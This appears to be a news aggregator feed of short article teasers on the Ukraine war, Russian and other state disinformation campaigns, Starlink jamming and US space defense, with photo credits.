Read 7 remaining paragraphs | Comments

In an exclusive interview with the Guardian, the Ukrainian president, Volodymyr Zelenskiy, revealed the tactics and traits that help him face the daily frustrations of leading a country at war for more than two years.

Within a ceremonial room inside Kyiv’s presidential compound, Zelenskiy spoke for nearly an hour with a Guardian team, including the editor-in-chief, Katharine Viner. The interview took place during perhaps the toughest time for Ukraine since the early days of the war. Russia is on the offensive in Kharkiv, an advance that follows months of delay in the US Congress over the passing of a major support package, limiting Ukraine’s battlefield capabilities

Continue reading...

💾

© Photograph: The Guardian

💾

© Photograph: The Guardian

Russian threat groups are using old tactics and generative AI to run malicious disinformation campaigns meant to discredit the Paris Olympic Games, France and its president, and the IOC -- less than two months before the Games begin.

The post Russian Threat Groups Turn Eyes to the Paris Olympic Games appeared first on Security Boulevard.

A study found that hundreds of sites, many without obvious Kremlin links, copied Russian propaganda and spread it to unsuspecting audiences ahead of the E.U. election.

© Misha Friedman/Getty Images

Iran and an Israeli company also exploited the tools in online influence efforts, but none gained much traction, an OpenAI report said.

© Jason Henry for The New York Times

In 2016, Russia used an army of trolls to interfere in the U.S. presidential election. This year, an American given asylum in Moscow may be accomplishing much the same thing all by himself.

© Alexander Zemlianichenko/Associated Press

Russia has deployed advanced tech to interfere with Elon Musk’s satellite internet service, Ukrainian officials said, leading to more outages on the northern front battle line.

© Sasha Maslov for The New York Times

Russia has deployed advanced tech to interfere with Elon Musk’s satellite internet service, Ukrainian officials said, leading to more outages on the northern front battle line.

© Sasha Maslov for The New York Times

Citing rapid advances by China and Russia, the United States is building an extensive capacity to fight battles in space.

© Craig Bailey/Florida Today, via Associated Press

America’s adversaries have mounted online campaigns to amplify the social and political conflicts over Gaza flaring at universities, researchers say.

© Amir Hamja/The New York Times